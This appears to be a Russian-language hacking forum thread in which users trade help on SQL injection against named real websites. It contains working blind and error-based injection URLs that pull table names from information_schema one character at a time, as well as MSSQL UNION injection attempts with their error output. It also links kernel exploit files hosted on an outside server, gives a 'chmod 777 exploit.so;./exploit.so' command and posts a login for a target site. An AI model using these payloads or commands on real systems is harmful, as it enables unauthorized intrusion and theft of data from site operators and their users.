Можно ли тут чтонить зделать тут ? у меня невышло =\ lineager.ru/lwdb/index.php?part=items&id=1+and+79=79
С запятыми не пашет вроде http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1+offset+1)+from+1+for+1))>1
нет отдает 404 на файлы. -- у меня вопрос нужно запретить запуск пхп скрптов,в папке,можно сделать это через htaccess?спасибо! -уже нашел) Code: RemoveHandler .php .phtml .php3 AddType application/x-httpd-php-source .php .phtml .php3
chmod 777 exploit.so;./exploit.so ибо в твоем случае через пулсаудио файл не запустился. -------------------------- http://fsb-my.name/c/exploit.c http://fsb-my.name/c/pwnkernel.c http://fsb-my.name/c/run.sh
takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&page=1{SQL-INJ} Можно ли раскрутить? Если да то как? А то никак не пойму как крутить такую скулю крутить
Инъекция в ORDER BY. Эм... Что за exploit.so и где его взять? Он в результате запуска этого эксплоита должен создаться? И что за пулсаудио (гугл говорит, что голосвая система, но это бред=\ )?
а как в таком случае правильно выводить данные ? т.е. как мне узнать какому символу соответсвует запрос ?
http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1+offset+n)+from+1+ for+1))>1 n=0 – первая таблица n=1 – вторая таблица n=2 – третья таблица и тд http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1+offset+1)+from+n+ for+1))>1 n=1 – первый символ n=2 – второй символ n=3 – третий символ и тд Автоматизируй процесс – накатай скрипт. Или уже готовый заюзай, тут где-то недалеко лежал ЗЫ базу задротов тебе врятле удастся достать – л2 сервер работает под mssql (если не джава) и как правило доступ к табличкам пользователей имеет только сервер авторизации (или как там он называется не помню уже …). Хотя всякое бывает
more than 1 row http://takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&page=1,if(substring(version(),1,1)=5,1,(select+column_name+from+information_schema.columns)) ну и соответственно далее как обычно http://takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&page=1,if(ASCII(SUBSTRING((SELECT+table_name+FROM+information_schema.tables+LIMIT+16,1),1,1))<102,1,(select+column_name+from+information_schema.columns)) ============================
Помогите разобраться с MSSQL injection Имеем: SQL ?id=496' Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ''. SQL ?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES-- Microsoft OLE DB Provider for SQL Server error '80040e14' All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. SQL ?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,1+FROM+INFORMATION_SCHEMA.TABLES-- Microsoft OLE DB Provider for SQL Server error '80040e07' Operand type clash: ntext is incompatible with int SQL ?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,'a'+FROM+INFORMATION_SCHEMA.TABLES-- Microsoft OLE DB Provider for SQL Server error '80040e14' All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. добавляем поля пока эта ошибка не пропадет... SQL ?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,'a',1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+INFORMATION_SCHEMA.TABLES-- ошибок не дает, но и ничего и не выводит Подскажите пожалуйста куда дальше рыть, или может я уже где-то туплю?
bumerok рыть лучше вот сюда: https://forum.antichat.ru/thread30501.html А если нужен конкретный ответ по конкретной скуле, то давай линк, гадание на операторах и конструкциях в теме ни к чему.
jokester вот линк тока нужно залогинится log: bugsrc pas: qwer1234 http://www.zapoznanie.pl/member/events_more_frame.asp?event_id=496' + почему-то из ie8 http 500, a из под ff 3.0.14 нормально выводит ошибку Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ''.